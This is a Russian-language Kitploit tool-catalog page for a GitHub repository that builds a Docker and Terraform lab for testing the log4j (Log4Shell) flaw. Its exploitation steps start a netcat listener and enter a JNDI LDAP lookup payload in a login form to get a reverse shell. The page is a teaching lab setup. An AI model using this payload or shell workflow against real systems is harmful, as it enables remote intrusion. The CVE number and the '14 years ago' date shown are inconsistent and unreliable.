Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4jtest — Terraform и Docker ресурсы для быстрого развертывания теста CVE-2021-44428 | Kitploit
Инструменты/GitHubGitHub/z3bul0n/log4jtest
Безопасность облачной инфраструктурыБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и Образование
GitHubz3bul0n/log4jtest

log4jtest

Terraform и Docker ресурсы для быстрого развертывания теста CVE-2021-44428

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Введение

Этот репозиторий настроен для быстрого тестирования уязвимости log4j с использованием Docker и Hashicorp Terraform. Все компоненты этого теста будут запущены в Docker-контейнерах в сети Docker, доступной через 'host.docker.internal'.

Благодарности / Отказ от ответственности

Эта тестовая среда основана на отличной статье из блога Raxis: (https://raxis.com/blog/log4j-exploit)

Уязвимое приложение и код эксплойта взяты у cyberxml (https://github.com/cyberxml/log4j-poc).

Всё, что я сделал, — это формализовал среду, чтобы было легко развернуть и протестировать этот восхитительный эксплойт.

Я не несу никакой ответственности за неблагоприятные последствия или вредоносные действия, которые могут возникнуть в результате использования материалов из этого репозитория. Точка. Решать, заслуживают ли эти материалы доверия, предстоит вам, и точно так же на вас лежит ответственность за этичное использование этой информации. Я лишь публикую эти материалы, чтобы исследователи, студенты и специалисты по безопасности могли быстро создать среду и протестировать эксплойт самостоятельно. Seacrest out.

Предварительные требования

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

Настройка

  1. Клонируйте этот репозиторий
  2. Выполните 'terraform init' в каталоге проекта
  3. Запустите демон Docker
  4. Выполните bash-скрипт 'docker-build.sh', чтобы собрать все образы контейнеров проекта.
  5. Выполните 'terraform apply', чтобы создать все контейнеры проекта.

Эксплуатация

  1. Подключитесь к оболочке контейнера log4j_netcat с помощью 'docker exec -it netcat /bin/bash' или аналогичной команды. Именно здесь вы получите своё shell-подключение к серверу-жертве после его установления.

  2. В своей сессии внутри контейнера log4j_netcat введите следующую команду, чтобы запустить прослушиватель:

root@kitploit:~
nc -lv -s 0.0.0.0 -p 9001
  1. В браузере перейдите по адресу http://host.docker.internal:8080/log4shell/

  2. Введите следующее в поле 'Username', а в поле 'Password' — всё, что угодно:

root@kitploit:~
${jndi:ldap://host.docker.internal:1389/a}
  1. Вернитесь к оболочке контейнера log4j_netcat и убедитесь, что вы подключились к серверу-жертве.

  2. Идите и творите хаос!

Скачать инструмент